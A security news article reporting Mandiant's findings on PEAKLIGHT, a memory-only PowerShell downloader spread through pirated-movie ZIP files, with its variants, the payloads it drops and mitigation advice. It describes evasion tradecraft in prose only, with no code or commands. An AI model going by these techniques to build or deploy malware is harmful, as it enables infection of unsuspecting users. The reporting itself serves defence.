Cybersecurity experts have detailed a sophisticated new memory-only dropper linked to a multi-stage malware infection process. This dropper, dubbed PEAKLIGHT, poses a massive threat due to its stealthy operations and complex attack chain.
PEAKLIGHT operates without leaving traces on disk and with several obfuscation techniques, making detection severely challenging.
From Pirated Movies to Malicious Payloads
The infection begins when users download pirated movie files that are actually just malicious ZIP files in disguise, and contain Microsoft Shortcut Files (LNK) to kick off the infection.
These LNK files trigger a PowerShell script that downloads additional malicious content from a remote server. According to the study by Mandiant, the infection chain reveals two variations in the PowerShell scripts used, demonstrating the attackers’ skill in bypassing traditional security measures by leveraging trusted system processes.
- Using legitimate system binaries to download and execute payloads
- Employing registry queries for the same purpose.
Once the initial infection is established, PEAKLIGHT proceeds to its second stage, where a JavaScript-based dropper, hidden within the victim’s system memory, decodes and executes the final downloader. This downloader, known as PEAKLIGHT, operates in two primary variations, each with distinct characteristics but with a common objective: to download additional malicious files from a content delivery network (CDN).
PEAKLIGHT Variants
PEAKLIGHT’s sophistication lies in its ability to check for specific ZIP archives in hard-coded file paths. If absent, it downloads them from a content delivery network (CDN). The malware has been observed downloading various payloads, including LUMMAC.V2, SHADOWADDER and CRYPTBOT.
Different PEAKLIGHT variations exist, each with distinct behaviors, including target directories, execution logic, and downloaded file names. The variations employ complex obfuscation techniques, including hexadecimal and Base64 encoding, to conceal the true nature of their payloads.
PEAKLIGHT Variation 1:
- Downloads files to the AppData directory
- Executes files based on their names
- Downloads a decoy video file to mask activity
PEAKLIGHT Variation 2:
- Targets the ProgramData directory
- Executes files based on discovery order
PEAKLIGHT Variation 3:
- Retrieves payloads from a different domain
- Drops additional malicious files, including AutoIt binaries
Protecting Against PEAKLIGHT
To mitigate PEAKLIGHT threats, the researchers recommend the following actions:
- Scan your environment against the potential indicators of compromise (IOCs) and YARA rules.
- Maintain updated security software to detect and block malicious activities.
- Be cautious of suspicious emails and attachments, especially those promising pirated content.
- Practice safe browsing habits and avoid clicking on unknown links.
The discovery of PEAKLIGHT is a strong example of the effectiveness of memory-only techniques to evade detection, as well as the proliferation of malicious payloads through seemingly harmless pirated content and abuse of trusted system processes.